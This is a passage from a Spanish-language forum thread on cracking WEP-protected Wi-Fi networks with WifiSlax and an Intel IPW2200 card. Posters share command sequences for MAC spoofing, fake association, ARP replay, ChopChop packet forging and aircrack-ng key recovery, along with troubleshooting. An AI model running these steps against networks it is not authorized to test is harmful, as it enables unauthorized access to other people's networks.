Todos los post de WifiSlax + IPW 2200 en uno

[lampi]

Lo intento contra mi router (Linksys)

No es culpa de la ipw ni de la wifislax, yo no puedo con el mio, con otros ap´s  si.

[*dudux]

Hola a todos, antes de nada felicitaros por esta maravilla de web y de foro.

Supongo que como muchos habra alucinado con wifislax. Hace unos dias que me decidi a darle caña a la 2200 de intel y la verdad, todo fue de maravilla, pero el ataque 2 no me resulta, se queda leyendo paquetes, he visto en el video que sobre los 200 ya coge uno, pero en mi caso ni con 15.000.

Os dejo un resumen de los pasos que realizo, si veis alguno innecesario agradeceria me corrigieseis.

1º) airodump eth0 pruebas 0 1

Veo las conexiones y apunto los datos del objetivo, como BSSID , ESSID y el canal

2º) iwconfig eth0 mode monitor channel XX

 Pongo la tarjeta en modo monitor en el canal adecuado, pero no lo he visto hacer en los videos.

3º) iwconfig eth0 essid "ap_objetivo" key 1234567890123


4º) airodump-ng -c canal_ap -b bssid_ap -w archivo.cap rtap0



CON CLIENTE CONECTADO (supongo ataque 3)

5º) aireplay-ng --ipwsys -3 -x 1024 -g 1000000 -b bssid -h cliente -i rtap0 eth0

SIN CLIENTE CONECTADO (ataque 2 según vi en el video)

5º) aireplay-ng –ipwsys -2 –t 1 –b bssid –c FF:FF:FF:FF:FF:FF –i rtap0 eth0

Este no lo entiendo muy bien ,las FF:FF son direccion mac del broadcast, que no se que es. Se queda leyendo paquetes.

Salu2.

yo lo que hay subrayado no lo hago....

[ertio]

Muchas gracias por contestar.

editado: no se porque, reinicie y ya me cambia bien la mac.

Despues de intentarlo me dice que fallo el ataque.

Me dedici a probar el ataque por fragmentacion, pero en la parte de  crear el xor que deberia durar 10 segundos aproximadamente en realizarle, a mi se me queda como en un bucle infinito en la pantalla, me surge la pregunta de si el programa afrag esta instalado en wifislax 1.2 para funcionar directamente o hay que modificar algo.

Tambien he notado que la señal de potencia de todos los aps que detecto me salen "-1". ¿bug del programa?

Por ultimo preguntar si alguno habeis adaptado una ipw2200 bg a una antena y que habeis utilizado, asi  como una buena antena para esta tarjeta, supongo que con 12 db sera suficiente. He leido que la edimax es buena.

Salu2.

[*dudux]

leete el manual de fragmentacion primero................te daras cuenta de una cosa muy importante.........talvez el error pq no te funciona.......

Manual Ataque de Fragmentación.
http://foro.seguridadwireless.net/index.php/topic,735.0.html


bug??? -1 es porque los drivers estan en proceso aun................es lo que tiene........en windows no reinyectan,,.,

[ertio]

Gracias de nuevo por tu ayuda, supongo que se debe a que wifislax 1.2 no lleva la version 0.8 de aircrack. El afrag creo que si que esta, pues se ejecuta. La cuestion que ejecuto desde la live y poco a poco me voy metiendo algo mas en esto de linux, pero no tengo configurada la tarjeta de red , por no decir que conecto a traves de una conexión PPPoE que no tengo ni idea de configurar para linux.

Ire mirando la forma de hacerlo, aunque supongo que antes saldra la versión 2.0 de wifislax y ya vendran incluidas estas mejoras.

*dudux, si estoy equivocado corrigeme, el problema es que di por hecho que lo llevaba incluido y no me paré en la parte de instalar mother fucker 0.8.

Salu2.

[*dudux]

cuando ize el manual estaba el aircrack 0.8,,,,,,,,,,,,ahora uso el 1.1 claro esta.........no es por eso..................



tu  respuesta en......
http://foro.seguridadwireless.net/index.php/topic,735.0.html

[ertio]

Ok, parece que ya encontre el problema. XD

Como sugerencia no estaria mal incluir en el tutorial que apuntas el ultimo post del hilo , el primero y unico de la pagina 2.

Por cierto, ¿ que tal te fue con el ataque 2 ?

Salu2.

[ertio]

Este resumen a ver si ayuda a algun poseedor de una IPW2200. Por supuesto estara lleno de errores, a ver si entre los que sepais mas ponemos hacer una guia o algo similar para los poseedores de ipw2200 que creo somos muchos.

RESUMEN DE ATAQUES CON IPW2200

Los 5 primeros pasos serian comunes para las opciones 1 y 2

1º) ifconfig eth0 up

2º)  airodump eth0 pruebas 0 1

Veo las conexiones y apunto los datos del objetivo, como BSSID , ESSID y el canal.

Una vez apuntado los datos necesarios del ap, del cliente , etc, cerramos el proceso con CONTROL+Z

3º ) iwconfig “interface” rate 1M

limitamos el rate de nuestra tarjeta a 1 Mb por segundo.
En interface ponemos rtap0 para ipw2200.
Hay veces que no se podra.

4º) iwconfig eth0 essid "ap_objetivo" key 1234567890123 channel “canal”

Este seria el ataque 1.
Me vinculo al ap con una key falsa
“ap objetivo”--> nombre de la conexión objetivo “paco”, “WLAN”, etc…
“canal”--> indicar el canal
Puede haber veces que no nos deje.

5º) airodump-ng -c canal -b bssid -w archivo rtap0

Lo ejecuto en otra ventana y empiezo a capturar datos indicando el canal y la mac del objetivo

"canal"--> se sustituye por el canal
"Bssid"-->se sustituye por la mac del objetivo
Archivo --> nombre del archivo donde se guardan las capturas de datos

OPCION 1:  CON CLIENTE CONECTADO (ataque 3)

6º) aireplay-ng --ipwsys -3 -x 1024 -g 1000000 -b bssid -h cliente -i rtap0 eth0

Inyecto trafico con el metodo de rh3nt0n. Con un cliente conectado.
Este no se muy bien lo que hace, si captura paquetes del cliente y los manda al ap.
Bssid-->se sustituye por la mac del objetivo
Cliente--> se sustituye por la mac del cliente conectado a la web

OPCION 2:SIN CLIENTE CONECTADO (ataque 2) 
cliente falso

6º) aireplay-ng - - ipwsys -2 –t 1 –b bssid –c FF:FF:FF:FF:FF:FF –i rtap0 eth0

Se agradeceria algo de información.

ATAQUE CHOP CHOP: sin cliente conectado

-->  ifconfig eth0 up hw ether 00:11:22:33:44:55

Con esto activamos la tarjeta y cambiamos la mac a 00:11:22:33:44:55

--> iwconfig eth0 essid “nombre del AP ” channel “canal” key 12345

Asi nos ponemos el nombre del AP y una clave cualquiera

--> airodump-ng - - ivs - - bssid “mac del AP” –w ataquechop rtap0

Comenzamos la captura indicando la mac del ap , capturando con rtap0 y guardando las capturas en el fichero ataquechop. Supongo que no hace falta poner la extension al indicar "- - ivs"

En otra ventana ponemos:

--> aireplay-ng –ipwsys -4 –a “mac AP” –h 11:22:33:44:55 –i rtap0 eth0

Cuando pregunte ¿use this packet ? le decimos Y. Cuando termine copiamos el nombre del archivo “replay_dec…..xor” para usarlo en el siguiente comando y forjar el ARP que reinyectaremos después.

--> arpforge-ng “replay_dec…..xor” 1 “mac del AP” 11:22:33:44:55 192.168.1.20 192.168.1.21 ficheroarp.cap

De esta forma usamos el fichero xor anterior para hacer el ARP que se reinyectara para aumentar los paquetes.
 “1” es el valor de FROMDS

--> aireplay-ng - - ipwsys -2 –r ficheroarp.cap eth0

Cuando pregunte ¿use this packet ? le decimos Y

--> aircrack–ng –n 64 ataquechop*.ivs

Probamos con -n 64 por si la clave es de 64 bits.

EL ATAQUE DE FRAGMENTACIÓN NO FUNCIONA EN IPW2200

Tampoco funcionaran los ataques si es un router cisco.

CAMBIAR MAC IPW2200:

--> Ifconfig eth0 up ether 00:11:22:33:44:55

En 00:11:22:33:44:55 --> mac deseada

La interfaz Rtap0 es la que se usa con airodump para capturar , especialmente configurado en wifislax 1.2 beta y la interfaz eth0 la usaremos con airoplay para inyectar.

Para comprobar si realmente tenemos una ipw2200 y no una 2100: --> dmesg | grep ipw2[/b]


Salu2.

[*dudux]

5º) airodump-ng -c canal -b bssid -w archivo.cap rtap0

Para comprobar si realmente tenemos una ipw2200 y no una 2100: --> dmesg | grep ipw2

[nanocomando68]

Muy buenas, me presento en este post como mi primero en esta web, llevo varios dias leyendo y probando sin exito, creo haber asimilado varias cosas nuevas en la relectura de este post como la de bajar rate a 1 M o estar cerca del objetivo a "gulismear" asi lo dicen por aqui....
Bueno aunque tengo mas preguntas que nadie, tengo los mismos problemas de todos asi que esta respuesta la usaré sólamente para presentarme y dar las gracias a tod@s los que ayudais a tantos.

[uNbAs]

Pues nada bienvenido seas ... eso si lee ... q hay mucha info XDDDD   

[lampi]

Como se supone que haceis el a1, asociar la mac falsa al ap

4º) iwconfig eth0 essid "ap_objetivo" key 1234567890123 channel “canal”

Este seria el ataque 1.
Me vinculo al ap con una key falsa
“ap objetivo”--> nombre de la conexión objetivo “paco”, “WLAN”, etc…
“canal”--> indicar el canal
Puede haber veces que no nos deje.

[patuchi]

Como me puedo autenticar y asociar al ap ??

algUien lo ha logrado con la ipw 2200BG ?

a mi me da el mensaje que con centrino NO se puede, que tiene que ver el procesador con la tarjeta que usemos ?.

No hay filtrado Mac, la señal es buena, y hay un cliente asociado....

 

[chilli33]

creo que deberia haber mandado este mensaje aqui,el tema es que no arranca la tarjeta wireless 2200bg con el inicio del pc corriendo wifislax o cualquier otro live cd pero quiero usar wifislax y ya no se que hacer con este tema con windows se inicia sola supongo que lo hara por software y por eso en linux no funciona y aunque presione el boton de encender la wlan del poortatil no arranca iwconfig me pone radio off....ya no se que hacer por favor os puede parecer un problema tonto pero yo ya no se que hacer no puedo configurar red ni nada porque no arraca la tarjeta...en fin espero su respuesta...

[lampi]

Tú viste algo sobre la falsa autentificacion de la ipw en algun video, yo no lo vi ni en el mio. 

[*dudux]

en el video del ataque chopchop se usa falsa autentificacion.......
 

[lampi]

Funciona el A1 con la ipw2200, esa es la pregunta.

[*dudux]

ok.......

la respuesta es si.......

[lampi]

Puedes hacer el favor de poner la sintaxis de el A1 con la ipw2200, que es lo que todos preguntan y nadie responde.  Gracias.

[*dudux]

aqui se ve claramente....
http://mirror-wifislax.lost-away.org/videos/chopchopipw2.htm

[Kozaki666]

creo que deberia haber mandado este mensaje aqui,el tema es que no arranca la tarjeta wireless 2200bg con el inicio del pc corriendo wifislax o cualquier otro live cd pero quiero usar wifislax y ya no se que hacer con este tema con windows se inicia sola supongo que lo hara por software y por eso en linux no funciona y aunque presione el boton de encender la wlan del poortatil no arranca iwconfig me pone radio off....ya no se que hacer por favor os puede parecer un problema tonto pero yo ya no se que hacer no puedo configurar red ni nada porque no arraca la tarjeta...en fin espero su respuesta...

Tal vez si indicas con pelos y señales tu modelo de portátil hay álguien que te pueda decir si existe un módulo que cubra el funcionamiento de los "botones software" de tu máquina. Aunque si es muy nuevo... :

[lampi]

aqui se ve claramente....
http://mirror-wifislax.lost-away.org/videos/chopchopipw2.htm

Entonces quieres decir que con iwconfig te asocias al AP

iwconfig eth0 essid "essid" channel x key x

[*dudux]

--> ifconfig eth0 up hw ether 00:11:22:33:44:55

Con esto activamos la tarjeta y cambiamos la mac a 00:11:22:33:44:55

--> iwconfig eth0 essid “nombre del AP ” channel “canal” key 12345

Asi nos ponemos el nombre del AP y una clave cualquiera

no te funciona?

ifconfig eth0 down && ifconfig rtap0 down
ifconfig eth0 up hw ether 00:11:22:33:44:55
ifconfig eth0 up && ifconfig rtap0 up
iwconfig eth0 essid “nombre del AP ” channel “canal” key 123456789123
iwconfig // y te aseguras de que te asocias---------

[lampi]

Tu pones la ipw como asociada al ap, pero hay se queda hasta que no entra el cliente legitimo que es cuando arranca la inyeccion, aunque esto es muy posible que mi router lo rechaze, ya se probrara por hay cuando salga.
Bueno ya esta, espero que mas de uno obtenga de aqui su respuesta.

[chilli33]

hola,mi portatil es un compaq presario v4160E 1,86 Ghz 1Gb ram intel centrino ...tendra 2 o 3 años..no se que mas datos necesitais saber???o alguna web donde buscar ese software .

[uNbAs]

Aqui tienes todo el soft q necesitas ... lo q realmente se necesita saber es la tarjeta q lleba intregrada .... 

[*dudux]

Tu pones la ipw como asociada al ap, pero hay se queda hasta que no entra el cliente legitimo que es cuando arranca la inyeccion, aunque esto es muy posible que mi router lo rechaze, ya se probrara por hay cuando salga.
Bueno ya esta, espero que mas de uno obtenga de aqui su respuesta.

que cliente legitimo... es una asociacion falsa........la ipw2200 funciona asi...no?
la mac lo dice todo 00:11:22:33:44:55..............

[lampi]

Eso es lo que dice cada uno, y yo te digo que sin cliente no inyectas por muy asociado que estes, que seguramente sea debido al ap puede ser,

[*dudux]

Eso es lo que dice cada uno, y yo te digo que sin cliente no inyectas por muy asociado que estes, que seguramente sea debido al ap puede ser,

son muchos factores .......eso ya lo sabemos .......pero el A1 funciona con la ipw2200.............mejor o peor............y a ti y a mi nos puede funcionar diferente,.....eso tenlo claro..........a veces peor y otras veces mejor.......
el AP influye mucho que un chopchop funcione...............mi AP de prueba en un Comtrend ct-536+ de jazztel .......y este permite todo tipo de ataque y de asociacion.................

[Waka]

Eso es lo que dice cada uno, y yo te digo que sin cliente no inyectas por muy asociado que estes, que seguramente sea debido al ap puede ser,

Buenas, solo quería aportar que yo he conseguido reinyectar asociando un cliente falso, sin problemas con mi ipw2200, y he conseguido muchos arp's, de la forma que he leido en este hilo, no lo he conseguido nunca, yo lo hago de la siguiente manera, pongo el airodump a escanear, cuando ya tengo el objetivo, lo ajusto a ese AP y canal, me conecto al AP usando la herramienta wireles para conectarme que trae el wifi slax, y seguido lanzo el atake 3, en no menos de 2 minutos empieza a reinyectar, quizas no sea el método correcto pero asi es como consigo hacerlo, si intento un atake 1 con comandos no hace nada de nada.

salu2

[chilli33]

Aqui tienes todo el soft q necesitas ... lo q realmente se necesita saber es la tarjeta q lleba intregrada .... 

HP PRO/Wireless 2200BG 3B Network Connection


Tambien lleva una ethernet realtek RTL8139 PCI Fast Ethernet Adapter a,b,c

si alguien puede ayudar por favor...

[patuchi]

me conecto al AP usando la herramienta wireles para conectarme que trae el wifi slax, y seguido lanzo el atake 3, en no menos de 2 minutos empieza a reinyectar

 
 
    Waka, podrias poner la sintaxis que usas para "conectarte" al AP, nos ilustraria a todos.

Gracias.

[uNbAs]

Simplemente usa el asistente wireless ... en vez de escribir comandos ... el asistente hace como si se conectara a inet normalmente, eso hace q el router le de una